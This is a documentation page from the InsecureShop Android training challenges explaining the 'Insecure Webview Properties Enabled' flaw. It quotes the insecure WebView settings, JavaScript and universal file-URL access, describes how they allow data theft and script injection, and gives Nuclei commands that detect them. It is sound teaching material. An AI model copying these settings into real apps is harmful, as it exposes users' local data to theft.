Challenges
  • Introduction
  • InsecureShop Challenges
    • Hardcoded Credentials
    • Insufficient URL Validation
    • Weak Host Validation
    • Arbitrary Code Execution
    • Intent Redirection (Access to Protected Components)
    • Unprotected Data URIs
    • Theft of Arbitrary files from LocalStorage
    • Using Components with Known Vulnerabilities
    • Insecure Broadcast Receiver
    • AWS Cognito Misconfiguration
    • Insecure use of FilePaths in FileProvider
    • Use of Implicit intent to send a broadcast with sensitive data
    • Intercepting Implicit intent to load arbitrary URL
    • Insecure Implementation of SetResult in exported Activity
    • Insecure Content Provider
    • Lack of SSL Certificate Validation
    • Insecure Webview Properties Enabled
    • Insecure Data Storage
    • Insecure Logging
Powered by GitBook
On this page

Was this helpful?

  1. InsecureShop Challenges

Insecure Webview Properties Enabled

PreviousLack of SSL Certificate ValidationNextInsecure Data Storage

Last updated 3 years ago

Was this helpful?

The activity com.insecureshop.WebViewActivity, com.insecureshop.WebView2Activityand com.insecureshop.PrivateActivity have the following insecure WebView properties enabled:

settings.setJavaScriptEnabled(true);
settings.setAllowUniversalAccessFromFileURLs(true);

The property setAllowUniversalFileAccessFromFileURLs allows any documents opened with the file:// scheme to access the content of any local documents and also of any other document or property accessible using other schemes like http(s)://. This leads to a violation of the Same Origin Policy and allows an attacker both to steal the user’s data and to interact with any other Internet services on behalf of the Android application.

Another WebView property called setJavaScriptEnabled allows execution of JavaScript in the context of a running application. Performing a man-in-the-middle (MitM) attack or tampering with a server response, an attacker can inject and execute arbitrary JavaScript code. This can lead to information leakage or remote code execution in specific scenarios.

You can use the Nuclei templates webview-javascript.yaml and webview-universal-access.yaml on a decompiled Android app to identify the insecure WebView properties in use.

echo /output_apktool/ | nuclei -t /file/android/webview-javascript.yaml
echo /output_apktool/ | nuclei -t /file/android/webview-universal-access.yaml

Exploitation (!!SPOILER!!)

The following video shows by abusing the WebView property setAllowUniversalFileAccessFromFileURLs we are able to exfiltrate InsecureShop application's localstorage data to the remote domain.

(Note: In the following video, this vulnerability was chained with finding)

Insecure Broadcast Receiver